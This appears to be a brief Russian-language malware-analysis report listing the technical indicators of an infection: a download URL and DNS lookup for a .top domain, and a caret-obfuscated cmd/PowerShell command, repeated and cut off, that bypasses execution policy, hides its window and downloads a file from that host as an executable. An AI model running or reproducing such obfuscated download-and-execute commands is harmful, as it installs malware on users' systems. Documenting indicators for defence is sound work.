Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWERshElL.EX^E -EXeCutI^O^NpOlIcY bYp^a^S^s^ ^-NOprof^il^E ^-W^iNd^o^wsTY^l^e HI^dd^En ^(^nE^w-^O^BjECT^ ^SySt^e^M.NET.w^ebcLI^ENt).^d^O^W^n^L^OAD^FIL^e('http://www.zonedopes...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "PoWERshElL.EX^E -EXeCutI^O^NpOlIcY bYp^a^S^s^ ^-NOprof^il^E ^-W^iNd^o^wsTY^l^e HI^dd^En ^(^nE^w-^O^BjECT^ ^SySt^e^M.NET.w^ebcLI^ENt).^d^O^W^n^L^OAD^FIL^e('http://www.zonedopes...' (со скрытым окном)